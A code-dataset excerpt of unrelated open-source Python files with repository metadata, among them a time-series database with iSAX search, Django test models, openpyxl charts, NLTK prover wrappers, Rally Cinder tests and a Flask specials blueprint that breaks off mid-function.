s.append("%3d %s" % (num, fmt))
return "\n".join(s)
def get_device(self, dtype, major, minor):
pass
def _test(argv):
d = Devices()
print d
if __name__ == "__main__":
import sys
_test(sys.argv)
| kdart/pycopia | core/pycopia/OS/Linux/proc/devices.py | Python | apache-2.0 | 1,668 |
from collections import defaultdict, OrderedDict
from operator import and_
from functools import reduce
import operator
import numpy as np
import gc
import uuid
from scipy.interpolate import interp1d
import sys
sys.path.insert(0, '../')
from timeseries import TimeSeries
import os
import procs
from procs.isax import isax_indb
import random
from .trees import BinarySearchTree, Tree_Initializer
OPMAP = {
'<': operator.lt,
'>': operator.gt,
'==': operator.eq,
'!=': operator.ne,
'<=': operator.le,
'>=': operator.ge
}
class PersistentDB:
"Database implementation with a local dictionary, which saves all necessary data to files for later use"
def __init__(self, schema, pkfield, load=False, dbname="db", overwrite=False, dist=procs.corr_indb, threshold = 10, wordlength = 16, tslen = 256, cardinality = 64):
"""
Parameters
----------
schema : dict
Key = name of field (e.g. 'ts', 'mean')
Value = dict of that field's properties. Recognized keys include:
'type': Required for all fields except ts. pkfield must have type str.
'index': Required for all fields.
pkfield : str
The name of the field which will be the primary key. Must match a key in schema.
load : bool
Whether to populate the database with an existing one on file.
dbname : str
Database filename
overwrite : bool
If load=False, whether to overwrite an existing database.
dist : function
Calculates the distance between two TimeSeries objects, must take arguments (ts1, ts2)
Attributes
----------
indexes : dict
Key = fieldname
Value = binary search tree (if int or float) or dictionary of sets (otherwise) mapping values to pks
rows : dict
Key = primary key
Value = dict of the fields associated with each key
schema : dict (See above)
pkfield : str (See above)
dbname : str (See above)
tslen : int
The length of each timeseries in the database, strictly enforced
"""
# ---- Validating input ---- #
if not isinstance(pkfield, str):
raise ValueError("Field name must be of type str")
if not isinstance(threshold, int):
raise ValueError("Threshold must be of type int")
if not isinstance(wordlength, int):
raise ValueError("Word length must be of type int")
if threshold <= 0:
raise ValueError("Threshold must be greater than zero")
if wordlength <= 0:
raise ValueError("Word length must be greater than zero")
if '1' in '{0:b}'.format(wordlength)[1:]:
raise ValueError("Word length must be a power of two")
if not isinstance(tslen, int):
raise ValueError("TimeSeries length must be of type int")
if tslen < wordlength:
raise ValueError("TimeSeries length must be greater than or equal to the word length")
if '1' in '{0:b}'.format(tslen)[1:]:
raise ValueError("TimeSeries length must be a power of two")
if not isinstance(cardinality, int):
raise ValueError("Cardinality must be of type int")
if cardinality <= 0:
raise ValueError("Cardinality must be greater than zero")
if '1' in '{0:b}'.format(cardinality)[1:]:
raise ValueError("Cardinality must be a power of two")
if cardinality > 64:
raise ValueError("Cardinalities greater than 64 are not supported")
if not isinstance(load, bool):
raise ValueError("Load must be of type bool")
if not isinstance(dbname, str):
raise ValueError("Database name must be string")
if not isinstance(overwrite, bool):
raise ValueError("Overwrite must be of type bool")
if isinstance(schema, dict):
for field in schema:
if field == 'DELETE':
raise ValueError("The fieldname 'DELETE' is forbidden")
if ':' in field:
raise ValueError("Field names may not contain the ':' character")
if field != 'ts':
if 'type' not in schema[field]:
raise ValueError("Schema must specify type for each non-ts field")
if field == pkfield and schema[field]['type'] != str:
raise ValueError("Primary key must be of type str")
if schema[field]['type'] not in [int, float, bool, str]:
raise ValueError("Only types int, float, bool, and str are supported")
if field[:5] == 'd_vp-':
raise ValueError("Field names beginning with 'd_vp-' are forbidden")
if field == 'vp' and schema[field]['type'] != bool:
raise ValueError("Field 'vp' must be of boolean type")
else:
raise ValueError("Schema must be a dictionary")
if pkfield not in schema:
raise ValueError("Primary key field must be included in schema")
# Assign attributes according to schema
self.indexes = {}
self.rows = {}
self.rows_SAX = {}
self.wordlength = wordlength
self.threshold = threshold
self.SAX_tree = Tree_Initializer(threshold = threshold, wordlength = wordlength).tree
self.card = cardinality
self.schema = schema
self.dbname = dbname
self.pkfield = pkfield
self.tslen = None
self.tslen_SAX = tslen
self.overwrite = overwrite
self.dist = dist
self.vps = []
for s in schema:
indexinfo = schema[s]['index']
if indexinfo is not None:
if schema[s]['type'] == int or schema[s]['type'] == float:
self.indexes[s] = BinarySearchTree()
else: # Add a bitmask option for strings?
self.indexes[s] = defaultdict(set)
if load:
try:
fd = open(dbname)
for l in fd.readlines():
[pk, field, val] = l.strip().split(":")
if field in self.schema:
if pk not in self.rows:
self.rows[pk] = {pkfield:pk}
else:
if self.schema[field]['type'] == bool:
if val == 'False':
self.rows[pk][field] = False
else:
self.rows[pk][field] = True
else:
self.rows[pk][field] = self.schema[field]['type'](val)
if pk not in self.rows_SAX:
self.rows_SAX[pk] = {pkfield:pk}
else:
if self.schema[field]['type'] == bool:
if val == 'False':
self.rows_SAX[pk][field] = False
else:
self.rows_SAX[pk][field] = True
else:
self.rows_SAX[pk][field] = self.schema[field]['type'](val)
if field == 'vp' and val == 'True':
self.vps.append(pk)
self.indexes['d_vp-'+pk] = BinarySearchTree()
elif field == 'DELETE':
if 'vp' in schema and self.rows[pk]['vp'] == True:
self.del_vp(pk)
del self.rows[pk]
del self.rows_SAX[pk]
elif field[:5] == 'd_vp-':
self.rows[pk][field] = float(val)
else:
raise IOError("Database is incompatible with input schema")
fd.close()
# Read in timeseries of non-deleted keys
for pk in self.rows:
tsarray = np.load(self.dbname+"_ts/"+pk+"_ts.npy")
self.rows[pk]['ts'] = TimeSeries(tsarray[0,:], tsarray[1,:])
self.tslen = tsarray.shape[1]
#tsarray2 = np.load(self.dbname+"_ts_SAX/"+pk+"_ts_SAX.npy")
x1 = np.linspace(min(tsarray[0,:]),max(tsarray[0,:]), self.tslen_SAX)
ts_SAX_data = interp1d(tsarray[0,:], tsarray[1,:])(x1)
ts_SAX_time = x1
ts_SAX = TimeSeries(ts_SAX_time,ts_SAX_data)
self.rows_SAX[pk]['ts'] = ts_SAX
rep = isax_indb(ts_SAX,self.card,self.wordlength)
self.SAX_tree.insert(pk, rep)
self.index_bulk(list(self.rows.keys()))
except:
raise IOError("Database does not exist or has been corrupted")
else:
if os.path.exists(dbname) and overwrite == False:
raise ValueError("Database of that name already exists. Delete existing db, rename, or set overwrite=True.")
def insert_ts(self, pk, ts):
try:
pk = str(pk)
except:
raise ValueError("Primary keys must be string-compatible")
if ':' in pk:
raise ValueError("Primary keys may not include the ':' character")
if not isinstance(ts, TimeSeries):
raise ValueError('Must insert a TimeSeries object')
if pk not in self.rows:
self.rows[pk] = {self.pkfield:pk}
else:
raise ValueError('Duplicate primary key found during insert')
if pk not in self.rows_SAX:
self.rows_SAX[pk] = {self.pkfield:pk}
else:
raise ValueError('Duplicate primary key found during insert')
# Save timeseries as a 2d numpy array
if self.tslen is None:
self.tslen = len(ts)
elif len(ts) != self.tslen:
raise ValueError('All timeseries must be of same length')
if not os.path.exists(self.dbname+"_ts"):
os.makedirs(self.dbname+"_ts")
np.save(self.dbname+"_ts/"+pk+"_ts.npy", np.vstack((ts.time, ts.data)))
x1 = np.linspace(min(ts.time),max(ts.time), self.tslen_SAX)
ts_SAX_data = interp1d(ts.time, ts.data)(x1)
ts_SAX_time = x1
ts_SAX = TimeSeries(ts_SAX_time,ts_SAX_data)
if not os.path.exists(self.dbname+"_ts_SAX"):
os.makedirs(self.dbname+"_ts_SAX")
np.save(self.dbname+"_ts_SAX/"+pk+"_ts_SAX.npy", np.vstack((ts_SAX.time, ts_SAX.data)))
# Save a record in the database file
if self.overwrite or not os.path.exists(self.dbname):
fd = open(self.dbname, 'w')
self.overwrite = False
else:
fd = open(self.dbname, 'a')
fd.write(pk+':'+self.pkfield+':'+pk+'\n')
if 'vp' in self.schema:
fd.write(pk+':vp:False\n')
fd.close()
self.rows[pk]['ts'] = ts
if 'vp' in self.schema:
self.rows[pk]['vp'] = False
self.rows_SAX[pk]['ts'] = ts_SAX
rep = isax_indb(ts_SAX,self.card,self.wordlength)
self.SAX_tree.insert(pk, rep)
if 'vp' in self.schema:
self.rows_SAX[pk]['vp'] = False
for vp in self.vps:
ts1 = self.rows[vp]['ts']
self.upsert_meta(pk, {'d_vp-'+vp : self.dist(ts1,ts)})
self.update_indices(pk)
def del_vp(self, vp):
""" Removes the d_vp-vp field from all rows """
for pk in self.rows:
if pk != vp:
del self.rows[pk]['d_vp-'+vp]
self.vps.remove(vp)
del self.indexes['d_vp-'+vp]
def delete_ts(self, pk):
if pk in self.rows:
for field in self.rows[pk]:
if field[:5] == 'd_vp-':
if field[5:] != pk:
self.indexes[field].delete(self.rows[pk][field], pk)
elif self.schema[field]['index'] is not None:
if self.schema[field]['type'] in [int, float]:
self.indexes[field].delete(self.rows[pk][field], pk)
else:
self.indexes[field][self.rows[pk][field]].remove(pk)
if field == 'vp' and self.rows[pk]['vp'] == True:
self.del_vp(pk)
del self.rows[pk]
fd = open(self.dbname, 'a')
fd.write(pk+':DELETE:0\n')
fd.close()
if pk in self.rows_SAX:
rep = isax_indb(self.rows_SAX[pk]['ts'],self.card,self.wordlength)
self.SAX_tree.delete(rep,pk)
del self.rows_SAX[pk]
def upsert_meta(self, pk, meta):
if isinstance(meta, dict) == False:
raise ValueError('Metadata should be in the form of a dictionary')
if pk not in self.rows:
raise ValueError('Timeseries should be added prior to metadata')
oldrow = self.rows[pk].copy()
for field in meta:
if field in self.schema:
try:
convertedval = self.schema[field]['type'](meta[field])
if self.schema[field]['type'] == str and ':' in convertedval:
raise ValueError("Strings may not include the ':' character")
self.rows[pk][field] = meta[field]
except:
raise ValueError("Value not compatible with type specified in schema")
elif field[:5] == 'd_vp-':
self.rows[pk][field] = float(meta[field])
else:
raise ValueError('Field not supported by schema')
fd = open(self.dbname, 'a')
for field in meta:
fd.write(pk+':'+field+':'+str(meta[field])+'\n')
fd.close()
self.update_indices(pk, oldrow)
def add_vp(self, pk=None):
"""
Adds pk as a vantage point
Parameters
----------
pk : str or None
The primary key of the timeseries which is to be added as a vantage point.
If None, method will choose a random entry in the database.
"""
# ---- Validating input ---- #
if 'vp' not in self.schema:
raise ValueError("Vantage points not supported by schema, must include 'vp' field")
if pk is None:
pkrand = self.rows.keys()
random.shuffle(list(pkrand))
foundvp = False
for k in pkrand:
if self.rows[k]['vp'] == False:
pk = k
foundvp = True
break
if foundvp == False:
raise ValueError("No more primary keys available as vantage points")
elif pk not in self.rows:
raise ValueError("Primary key not in database")
elif self.rows[pk]['vp']:
raise ValueError("This timeseries is already a vantage point")
self.vps.append(pk)
self.upsert_meta(pk, {'vp':True})
self.indexes['d_vp-'+pk] = BinarySearchTree()
ts1 = self.rows[pk]['ts']
for key in self.rows:
ts2 = self.rows[key]['ts']
self.upsert_meta(key, {'d_vp-'+pk:self.dist(ts1,ts2)})
def simsearch_SAX(self, ts):
if isinstance(ts,TimeSeries):
ts = [ts.time,ts.data]
x1 = np.linspace(min(ts[0]),max(ts[0]), self.tslen_SAX)
ts_SAX_data = interp1d(ts[0], ts[1])(x1)
ts_SAX_time = x1
ts_SAX = TimeSeries(ts_SAX_time,ts_SAX_data)
rep = isax_indb(ts_SAX,self.card,self.wordlength)
n = self.SAX_tree.search(rep)
closestpk = None
pkdist = None
if n.ts:
for pk in n.ts:
thisdist = self.dist(ts_SAX, self.rows_SAX[pk]['ts'])
if pkdist is None or thisdist < pkdist:
closestpk = pk
pkdist = thisdist
else:
n = self.SAX_tree.search2(rep)
for pk in n.ts:
thisdist = self.dist(ts_SAX, self.rows_SAX[pk]['ts'])
if pkdist is None or thisdist < pkdist:
closestpk = pk
pkdist = thisdist
return closestpk
# if closestpk:
# return self.rows[closestpk]['ts']
# else:
# return None
def simsearch(self, ts):
""" Search over all timeseries in the database and return the primary key
of the object which is closest """
if not isinstance(ts, TimeSeries):
raise ValueError("Input must be a TimeSeries object")
if len(self.vps) == 0:
raise ValueError("Database must contain vantage points before simsearch can be called")
# Find closest vantage point
closestvp = None
vpdist = None
for vp in self.vps:
thisdist = self.dist(ts, self.rows[vp]['ts'])
if vpdist is None or thisdist < vpdist:
closestvp = vp
vpdist = thisdist
# Select all timeseries within 2*vpdist from closestvp
closepks,_ = self.select(meta={'d_vp-'+closestvp:{'<=':2*vpdist}}, fields=None)
# Find closest timeseries
closestpk = None
pkdist = None
for pk in closepks:
thisdist = self.dist(ts, self.rows[pk]['ts'])
if pkdist is None or thisdist < pkdist:
closestpk = pk
pkdist = thisdist
return closestpk
def index_bulk(self, pks=[]):
if len(pks) == 0:
pks = self.rows
for pkid in pks:
self.update_indices(pkid)
def update_indices(self, pk, oldrow=None):
# If oldrow = None, assume all assignments are new. If not, check whether the old values need to be deleted.
row = self.rows[pk]
for field in row:
val = row[field]
if field[:5] == 'd_vp-' or (self.schema[field]['index'] is not None and self.schema[field]['type'] in [int,float]):
if oldrow is not None and field in oldrow:
if oldrow[field] != val:
oldval = oldrow[field]
self.indexes[field].delete(oldval, pk)
self.indexes[field].put(val, pk)
else:
self.indexes[field].put(val, pk)
elif self.schema[field]['index'] is not None:
if oldrow is not None and field in oldrow:
if oldrow[field] != val:
oldval = oldrow[field]
self.indexes[field][oldval].remove(pk)
self.indexes[field][val].add(pk)
else:
self.indexes[field][val].add(pk)
def select(self, meta, fields, additional=None):
# Enforce appropriate input
if isinstance(meta, dict) == False:
raise ValueError('Metadata should be in the form of a dictionary')
if fields is not None and isinstance(fields, list) == False:
raise ValueError('Fields should either be in list form or None')
sort = 0
limit = None
# Allows nonsense input into additional, just ignores it
if additional is not None:
if 'sort_by' in additional and 'order' in self.schema and self.schema['order']['index'] is not None:
if additional['sort_by'] == '-order': sort = -1
if additional['sort_by'] == '+order': sort = 1
if len(additional) > 1 and 'limit' in additional:
limit = int(additional['limit'])
# Find primary keys for timeseries which match metadata
# If no metadata provided, return all rows
if len(meta) == 0:
pks = list(self.rows.keys())
elif len(meta) == 1 and self.pkfield in meta:
pks = [meta['pk']]
# Otherwise, search for matching rows
else:
first = True
for field in meta:
# Define operator (For now assuming just one per field)
if isinstance(meta[field],dict):
for opkey in meta[field]:
op = OPMAP[opkey]
compval = meta[field][opkey]
else:
op = OPMAP['==']
compval = meta[field]
pks_field = []
if field not in self.schema and field[:5] != 'd_vp-':
raise ValueError('Field not supported by schema')
if field[:5] != 'd_vp-' and self.schema[field]['index'] is None:
raise ValueError('May only search by indexed fields or primary key')
else:
if field[:5] == 'd_vp-' or self.schema[field]['type'] in [int, float]:
if op == OPMAP['==']:
pks_field = self.indexes[field].get(compval)
else:
pks_field = self.indexes[field].collect(compval, op)
else:
for val in self.indexes[field]:
if op(val,compval):
pks_field = pks_field + list(self.indexes[field][val])
if first:
pks = set(pks_field)
first = False
else:
pks = pks.intersection(set(pks_field))
pks = list(pks)
# Retrieve appropriate fields
matchfields = []
orderfield = []
# Return only pks
if fields is None:
for pk in pks:
matchfields.append({})
if 'order' in self.rows[pk] and sort != 0:
orderfield.append(self.rows[pk]['order']*sort)
else:
orderfield.append(float('inf')) # This ensures reasonable behavior
# Return all metadata
elif len(fields) == 0:
for pk in pks:
pkfields = {}
pkrow = self.rows[pk]
allfields = self.rows[pk].keys()
for f in allfields:
if f != 'ts':
pkfields[f] = pkrow[f]
matchfields.append(pkfields)
if 'order' in self.rows[pk] and sort != 0:
orderfield.append(self.rows[pk]['order']*sort)
else:
orderfield.append(float('inf')) # This ensures reasonable behavior if order is not defined for that pk
# Return specific metadata
else:
for pk in pks:
pkfields = {}
pkrow = self.rows[pk]
for f in fields:
if f in pkrow:
pkfields[f] = pkrow[f]
matchfields.append(pkfields)
if 'order' in self.rows[pk] and sort != 0:
orderfield.append(self.rows[pk]['order']*sort)
else:
orderfield.append(float('inf'))
if sort != 0:
sortind = [y for (x,y) in sorted(zip(orderfield, range(len(orderfield))))]
matchfields = [matchfields[i] for i in sortind]
pks = [y for x,y in sorted(zip(orderfield, pks))]
if limit is None:
return pks, matchfields
else:
return pks[:limit], matchfields[:limit] | Planet-Nine/cs207project | tsdb/persistentdb.py | Python | mit | 23,824 |
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
class Event(models.Model):
# Oracle can have problems with a column named "date"
date = models.DateField(db_column="event_date")
class Parent(models.Model):
name = models.CharField(max_length=128)
class Child(models.Model):
parent = models.ForeignKey(Parent, editable=False, null=True)
name = models.CharField(max_length=30, blank=True)
age = models.IntegerField(null=True, blank=True)
class Genre(models.Model):
name = models.CharField(max_length=20)
class Band(models.Model):
name = models.CharField(max_length=20)
nr_of_members = models.PositiveIntegerField()
genres = models.ManyToManyField(Genre)
@python_2_unicode_compatible
class Musician(models.Model):
name = models.CharField(max_length=30)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Group(models.Model):
name = models.CharField(max_length=30)
members = models.ManyToManyField(Musician, through='Membership')
def __str__(self):
return self.name
class Membership(models.Model):
music = models.ForeignKey(Musician)
group = models.ForeignKey(Group)
role = models.CharField(max_length=15)
class Quartet(Group):
pass
class ChordsMusician(Musician):
pass
class ChordsBand(models.Model):
name = models.CharField(max_length=30)
members = models.ManyToManyField(ChordsMusician, through='Invitation')
class Invitation(models.Model):
player = models.ForeignKey(ChordsMusician)
band = models.ForeignKey(ChordsBand)
instrument = models.CharField(max_length=15)
class Swallow(models.Model):
origin = models.CharField(max_length=255)
load = models.FloatField()
speed = models.FloatField()
class Meta:
ordering = ('speed', 'load')
class UnorderedObject(models.Model):
"""
Model without any defined `Meta.ordering`.
Refs #17198.
"""
bool = models.BooleanField(default=True)
class OrderedObjectManager(models.Manager):
def get_query_set(self):
return super(OrderedObjectManager, self).get_query_set().order_by('number')
class OrderedObject(models.Model):
"""
Model with Manager that defines a default order.
Refs #17198.
"""
name = models.CharField(max_length=255)
bool = models.BooleanField(default=True)
number = models.IntegerField(default=0, db_column='number_val')
objects = OrderedObjectManager()
| openhatch/new-mini-tasks | vendor/packages/Django/tests/regressiontests/admin_changelist/models.py | Python | apache-2.0 | 2,489 |
from __future__ import absolute_import
# Copyright (c) 2010-2015 openpyxl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# @license: http://www.opensource.org/licenses/mit-license.php
# @author: see AUTHORS file
from openpyxl.drawing import Drawing, Shape
from .legend import Legend
from .series import Series
class Chart(object):
""" raw chart class """
GROUPING = 'standard'
TYPE = None
def mymax(self, values):
return max([x for x in values if x is not None])
def mymin(self, values):
return min([x for x in values if x is not None])
def __init__(self):
self.series = []
self._series = self.series # backwards compatible
# public api
self.legend = Legend()
self.show_legend = True
self.lang = 'en-GB'
self.title = ''
self.print_margins = dict(b=.75, l=.7, r=.7, t=.75, header=0.3, footer=.3)
# the containing drawing
self.drawing = Drawing()
self.drawing.left = 10
self.drawing.top = 400
self.drawing.height = 400
self.drawing.width = 800
# the offset for the plot part in percentage of the drawing size
self.width = .6
self.height = .6
self._margin_top = 1
self._margin_top = self.margin_top
self._margin_left = 0
# the user defined shapes
self.shapes = []
self._shapes = self.shapes # backwards compatible
def append(self, obj):
"""Add a series or a shape"""
if isinstance(obj, Series):
self.series.append(obj)
elif isinstance(obj, Shape):
self.shapes.append(obj)
add_shape = add_serie = add_series = append
def __iter__(self):
return iter(self.series)
def get_y_chars(self):
""" estimate nb of chars for y axis """
_max = max([s.max() for s in self])
return len(str(int(_max)))
@property
def margin_top(self):
""" get margin in percent """
return min(self._margin_top, self._get_max_margin_top())
@margin_top.setter
def margin_top(self, value):
""" set base top margin"""
self._margin_top = value
def _get_max_margin_top(self):
mb = Shape.FONT_HEIGHT + Shape.MARGIN_BOTTOM
plot_height = self.drawing.height * self.height
return float(self.drawing.height - plot_height - mb) / self.drawing.height
@property
def margin_left(self):
return max(self._get_min_margin_left(), self._margin_left)
@margin_left.setter
def margin_left(self, value):
self._margin_left = value
def _get_min_margin_left(self):
ml = (self.get_y_chars() * Shape.FONT_WIDTH) + Shape.MARGIN_LEFT
return float(ml) / self.drawing.width
| maheshcn/memory-usage-from-ldfile | openpyxl/charts/chart.py | Python | gpl-2.0 | 3,792 |
# -*- coding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file in module root
# directory
##############################################################################
from . import account_invoice_refund
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | adhoc-dev/odoo-addons | account_refund_invoice_fix/__init__.py | Python | agpl-3.0 | 373 |
# Natural Language Toolkit: Interface to Theorem Provers
#
# Author: Dan Garrette <dhgarrette@gmail.com>
# Ewan Klein <ewan@inf.ed.ac.uk>
#
# URL: <http://nltk.sf.net>
# For license information, see LICENSE.TXT
from nltk.sem.logic import ApplicationExpression, Operator, LogicParser
import tableau
import prover9
import mace
"""
A wrapper module that calls theorem provers and model builders.
"""
def get_prover(goal=None, assumptions=[], prover_name='Prover9'):
"""
@param goal: Input expression to prove
@type goal: L{logic.Expression}
@param assumptions: Input expressions to use as assumptions in the proof
@type assumptions: L{list} of logic.Expression objects
"""
if prover_name.lower() == 'tableau':
prover_module = tableau.Tableau
elif prover_name.lower() == 'prover9':
prover_module = prover9.Prover9
return prover_module(goal, assumptions)
def get_model_builder(goal=None, assumptions=[], model_builder_name='Mace'):
"""
@param goal: Input expression to prove
@type goal: L{logic.Expression}
@param assumptions: Input expressions to use as assumptions in the proof
@type assumptions: L{list} of logic.Expression objects
"""
if model_builder_name.lower() == 'mace':
builder_module = mace.Mace
return builder_module(goal, assumptions)
def demo_drt_glue_remove_duplicates(show_example=-1):
from nltk_contrib.gluesemantics import drt_glue
examples = ['David sees Mary',
'David eats a sandwich',
'every man chases a dog',
'John chases himself',
'John likes a cat',
'John likes every cat',
'he likes a dog',
'a dog walks and he leaves']
example_num = 0
hit = False
for sentence in examples:
if example_num==show_example or show_example==-1:
print '[[[Example %s]]] %s' % (example_num, sentence)
readings = drt_glue.parse_to_meaning(sentence, True)
for j in range(len(readings)):
reading = readings[j].simplify().resolve_anaphora()
print reading
print ''
hit = True
example_num += 1
if not hit:
print 'example not found'
def demo():
from nltk_contrib.drt import DRT
DRT.testTp_equals()
print '\n'
lp = LogicParser()
a = lp.parse(r'some x.((man x) and (walks x))')
b = lp.parse(r'some x.((walks x) and (man x))')
bicond = ApplicationExpression(ApplicationExpression(Operator('iff'), a), b)
print "Trying to prove:\n '%s <-> %s'" % (a.infixify(), b.infixify())
print 'tableau: %s' % get_prover(bicond, prover_name='tableau').prove()
print 'Prover9: %s' % get_prover(bicond, prover_name='Prover9').prove()
print '\n'
demo_drt_glue_remove_duplicates()
lp = LogicParser()
a = lp.parse(r'all x.((man x) implies (mortal x))')
b = lp.parse(r'(man socrates)')
c1 = lp.parse(r'(mortal socrates)')
c2 = lp.parse(r'(not (mortal socrates))')
print get_prover(c1, [a,b], 'prover9').prove()
print get_prover(c2, [a,b], 'prover9').prove()
print get_model_builder(c1, [a,b], 'mace').build_model()
print get_model_builder(c2, [a,b], 'mace').build_model()
if __name__ == '__main__':
demo()
| hectormartinez/rougexstem | taln2016/icsisumm-primary-sys34_v1/nltk/nltk-0.9.2/nltk/inference/inference.py | Python | apache-2.0 | 3,449 |
# Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
import mock
from rally import exceptions
from rally.plugins.openstack.wrappers import cinder as cinder_wrapper
from tests.unit import test
@ddt.ddt
class CinderWrapperTestCase(test.ScenarioTestCase):
@ddt.data(
{"version": "1", "expected_class": cinder_wrapper.CinderV1Wrapper},
{"version": "2", "expected_class": cinder_wrapper.CinderV2Wrapper}
)
@ddt.unpack
def test_wrap(self, version, expected_class):
client = mock.MagicMock()
client.choose_version.return_value = version
self.assertIsInstance(cinder_wrapper.wrap(client, mock.Mock()),
expected_class)
@mock.patch("rally.plugins.openstack.wrappers.cinder.LOG")
def test_wrap_wrong_version(self, mock_log):
client = mock.MagicMock()
client.choose_version.return_value = "dummy"
self.assertRaises(exceptions.InvalidArgumentsException,
cinder_wrapper.wrap, client, mock.Mock())
self.assertTrue(mock_log.warning.mock_called)
class CinderV1WrapperTestCase(test.TestCase):
def setUp(self):
super(CinderV1WrapperTestCase, self).setUp()
self.client = mock.MagicMock()
self.client.choose_version.return_value = "1"
self.owner = mock.Mock()
self.wrapped_client = cinder_wrapper.wrap(self.client, self.owner)
def test_create_volume(self):
self.wrapped_client.create_volume(1, display_name="fake_vol")
self.client.return_value.volumes.create.assert_called_once_with(
1, display_name=self.owner.generate_random_name.return_value)
def test_update_volume(self):
self.wrapped_client.update_volume("fake_id", display_name="fake_vol",
display_description="_updated")
self.client.return_value.volumes.update.assert_called_once_with(
"fake_id",
display_name=self.owner.generate_random_name.return_value,
display_description="_updated")
def test_create_snapshot(self):
self.wrapped_client.create_snapshot("fake_id",
display_name="fake_snap")
(self.client.return_value.volume_snapshots.create.
assert_called_once_with(
"fake_id",
display_name=self.owner.generate_random_name.return_value))
class CinderV2WrapperTestCase(test.TestCase):
def setUp(self):
super(CinderV2WrapperTestCase, self).setUp()
self.client = mock.MagicMock()
self.client.choose_version.return_value = "2"
self.owner = mock.Mock()
self.wrapped_client = cinder_wrapper.wrap(self.client, self.owner)
def test_create_volume(self):
self.wrapped_client.create_volume(1, name="fake_vol")
self.client.return_value.volumes.create.assert_called_once_with(
1, name=self.owner.generate_random_name.return_value)
def test_create_snapshot(self):
self.wrapped_client.create_snapshot("fake_id", name="fake_snap")
(self.client.return_value.volume_snapshots.create.
assert_called_once_with(
"fake_id",
name=self.owner.generate_random_name.return_value))
def test_update_volume(self):
self.wrapped_client.update_volume("fake_id", name="fake_vol",
description="_updated")
self.client.return_value.volumes.update.assert_called_once_with(
"fake_id", name=self.owner.generate_random_name.return_value,
description="_updated")
| yeming233/rally | tests/unit/plugins/openstack/wrappers/test_cinder.py | Python | apache-2.0 | 4,204 |
# Generated by Django 2.2.12 on 2020-05-01 16:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('zerver', '0279_message_recipient_subject_indexes'),
]
operations = [
migrations.AddField(
model_name='userprofile',
name='presence_enabled',
field=models.BooleanField(default=True),
),
]
| showell/zulip | zerver/migrations/0280_userprofile_presence_enabled.py | Python | apache-2.0 | 416 |
#***************************************************************************
#* *
#* Copyright (c) 2012 Yorik van Havre <yorik@uncreated.net> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
import FreeCAD
rf=FreeCAD.ParamGet("User parameter:BaseApp/Preferences/Mod/Start")
rf.SetBool("AllowDownload",True)
| sanguinariojoe/FreeCAD | src/Mod/Start/StartPage/EnableDownload.py | Python | lgpl-2.1 | 1,734 |
"""
This module contains the logic for handling the user specials model in the template
"""
from __future__ import unicode_literals, print_function
import json
import logging.config
from flask import request, jsonify, Blueprint
from flask_login import current_user
from google.appengine.ext import ndb
from handlers.query import Query
from handlers.utils import date_handler, to_json
from models.models import Issue
logger = logging.getLogger(__name__)
user_specials_api = Blueprint('user_specials_api', __name__)
@user_specials_api.route('/', methods=['POST'])
@user_specials_api.route('/index.html', methods=['POST'])
def get_specials():
"""
Retrieves user's special issues.
:returns: JSON object with user's special issues object
"""
if request.method == 'POST':
query = Query()
return json.dumps(to_json(query.get_specials()), default=date_handler)
@user_specials_api.route('/user/add_special_issue/', methods=['POST'])
def add_special_issue():
"""
Adds requested issue via POST to the user's specials list
:returns: JSON object with operation outcome
"""
my_user = current_user
issue_title = request.form['special_issue']
special_id = ndb.Key(Issue, issue_title)
logger.debug("received " + str(request))
if special_id not in my_user.specials_list:
my_user.specials_list.append(special_id)
my_user.put()
logger.debug("user id:" + str(my_user.key) + " special added: " + issue_title)
return jsonify(content=issue_title + " added")
else:
logger.debug("user id:" + str(my_user.key) + " special " + issue_title + " non found")
return jsonify(content=issue_title + " already added")
@user_specials_api.route('/user/remove_special_issue/', methods=['POST'])
def remove_special_issue():
"""
Removes requested issue via POST from the user's specials list
:returns: JSON object with operation outcome
"""
my_user = current_user
issue_title = request.form['special_issue']
special_id = ndb.Key(Issue, issue_title)
logger.debug("received " + str(request))
if special_id in my_user.specials_list:
my_user.specials_list.remove(special_id)
my_user.put()
logger.debug("user id:" + str(my_user.key) + " special " + issue_title + " removed ")
return jsonify(content=issue_title + " removed")
else:
